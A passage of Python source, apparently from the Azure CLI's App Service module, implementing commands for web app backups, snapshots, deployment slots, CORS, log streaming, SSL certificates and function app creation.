number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
backup_request = BackupRequest(backup_request_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except DefaultErrorResponseException:
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(db_name, db_type, db_connection_string):
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(frequency):
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_location_from_resource_group(cli_ctx, resource_group_name):
from azure.cli.core.profiles import ResourceType
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_deleted_apps_locations(cli_ctx):
from azure.cli.core.profiles import ResourceType
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def set_deployment_user(cmd, user_name, password=None):
'''
Update deployment credentials.(Note, all webapps in your subscription will be impacted)
'''
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot)
full_xml = ''
for f in content:
full_xml += f.decode()
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
url = site.enabled_host_names[0] # picks the custom domain URL incase a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob suport
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
SiteLogsConfig, HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging is not None:
if not application_logging:
level = 'Off'
elif level is None:
level = 'Error'
fs_log = FileSystemApplicationLogsConfig(level=level)
application_logs = ApplicationLogsConfig(file_system=fs_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
# TODO: az blob storage log config currently not in use, will be impelemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
if action == 'swap':
poller = client.web_apps.swap_slot_slot(resource_group_name, webapp,
slot, (target_slot or 'production'), True)
return poller
if action == 'preview':
if target_slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name,
webapp, slot, True)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
slot, target_slot, True)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
# Extra encode() and decode for stdout which does not surpport 'utf-8'
print(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace'), end='') # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file):
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get')
cert_file = open(certificate_file, 'rb')
cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def _update_host_name_ssl_state(cli_ctx, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cli_ctx, resource_group_name, webapp_name, 'create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd.cli_ctx, resource_group_name, name, webapp,
webapp_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd.cli_ctx, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper(object):
def __init__(self, client, linux=False):
self._client = client
self._linux = linux
self._stacks = []
def resolve(self, display_name):
self._load_stacks()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks()
return self._stacks
@staticmethod
def update_site_config(stack, site_config):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(stack, site_config):
if site_config.app_settings is None:
site_config.app_settings = []
site_config.app_settings += [NameValuePair(name=k, value=v) for k, v in stack['configs'].items()]
return site_config
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
# get all stack version except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
number_of_workers=None, max_burst=None, location=None, tags=None):
sku = _normalize_sku(sku)
tier = get_sku_name(sku)
if max_burst is not None:
if tier.lower() != "elasticpremium":
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
number_of_workers, min_val=0, max_val=20)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(plan_info):
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(plan_info):
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def validate_and_convert_to_int(flag, val):
try:
return int(val)
except ValueError:
raise CLIError("Usage error: {} is expected to have an int value.".format(flag))
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
value = validate_and_convert_to_int(flag_name, value)
if min_val > value or value > max_val:
raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
max_val))
return value
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, runtime=None, runtime_version=None, consumption_plan_location=None,
app_insights=None, app_insights_key=None, disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None):
# pylint: disable=too-many-statements, too-many-branches
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
client = web_client_factory(cmd.cli_ctx)
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((l for l in locations if l['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise CLIError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
if runtime:
if is_linux and runtime not in LINUX_RUNTIMES:
raise CLIError("usage error: Currently supported runtimes (--runtime) in linux function apps are: {}."
.format(', '.join(LINUX_RUNTIMES)))
if not is_linux and runtime not in WINDOWS_RUNTIMES:
raise CLIError("usage error: Currently supported runtimes (--runtime) in windows function apps are: {}."
.format(', '.join(WINDOWS_RUNTIMES)))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_WORKER_RUNTIME', value=runtime))
if runtime_version is not None:
if runtime is None:
raise CLIError('Must specify --runtime to use --runtime-version')
allowed_versions = RUNTIME_TO_IMAGE_FUNCTIONAPP[runtime].keys()
if runtime_version not in allowed_versions:
raise CLIError('--runtime-version {} is not supported for the selected --runtime {}. '
'Supported versions are: {}'
.format(runtime_version, runtime, ', '.join(allowed_versions)))
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if is_consumption:
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='~2'))
else:
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='~2'))
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
if runtime not in RUNTIME_TO_IMAGE_FUNCTIONAPP.keys():
raise CLIError("An appropriate linux image for runtime:'{}' was not found".format(runtime))
if deployment_container_image_name is None:
site_config.linux_fx_version = _get_linux_fx_functionapp(is_consumption, runtime, runtime_version)
else:
functionapp_def.kind = 'functionapp'
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION', value='~2'))
# adding appsetting to site to make it a function
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_NODE_DEFAULT_VERSION',
value=_get_website_node_version_functionapp(runtime,
runtime_version)))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(plan_info):
site_config.always_on = True
# If plan is elastic premium or windows consumption, we need these app settings
is_windows_consumption = consumption_plan_location is not None and not is_linux
if is_plan_elastic_premium(plan_info) or is_windows_consumption:
